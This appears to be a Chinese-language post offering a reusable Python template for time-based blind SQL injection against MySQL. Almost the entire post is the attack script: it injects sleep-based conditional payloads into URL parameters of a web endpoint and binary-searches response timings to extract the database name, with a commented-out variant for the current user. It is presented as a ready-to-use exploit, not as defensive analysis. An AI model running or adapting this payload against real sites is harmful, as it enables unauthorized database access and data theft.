mysql盲注模板

几次mysql盲注中抽出来的盲注模板

import requests
import time
time_conf = 1
results = ""
for i in range(1, 40):
    min_char_index = 1  # 当前字符最小ASCII
    large_char_index = 250  # 当前字符最大ASCII
    fount = False
    current_char = ""
    print("当前判断位数 ", i)
    while True:  # 二分法
        print("间距 ", min_char_index, large_char_index)
        medium_char_index = int((min_char_index + large_char_index)/2)  # ASCII值中位数
        # 重复请求三次
        running_time = 0
        for _num in range(3):  # 每个字符请求三次取均值，避免网络波动导致影响
            url = f"https://example.com?userId=130" \
                  f"/**/or/**/1=1/**/and/**/" \
                  f"if((ascii(substr(database(),{i},1))%3e{medium_char_index}),sleep({time_conf}),1=2)" \
                  f"&phone=18888888888"  # 该场景超过一秒后端的调用会中断，所以这个if最多只有一秒多 
            # url = f"https://example.com?pageNo=1&pageSize=5&orderBy=desc," \
            #       f"(select*from(select+sleep(" \
            #       f"if((ascii(substr(user(),{i},1))%3e{medium_char_index}),sleep({time_conf}),1)" \
            #       f")union/**/select+1)a)"
            start_time = time.time()
            rep = requests.get(url)
            running_time += (time.time() - start_time)
        running_time = running_time/3
        if large_char_index - min_char_index == 1:
            current_char = ""
            if running_time >= time_conf:
                current_char = chr(large_char_index)
            else:
                current_char = chr(min_char_index)
            break
        if running_time > time_conf:  # 根据响应时间判断字符位于哪个二分区间
            min_char_index = medium_char_index
        else:
            large_char_index = medium_char_index
    print("字符=>", current_char, "  ASCII=>", ord(current_char))
    if ord(current_char) == 1 or ord(current_char) == 250:
        break
    results += current_char
    print("当前结果=>", results)
print("结果=>", results)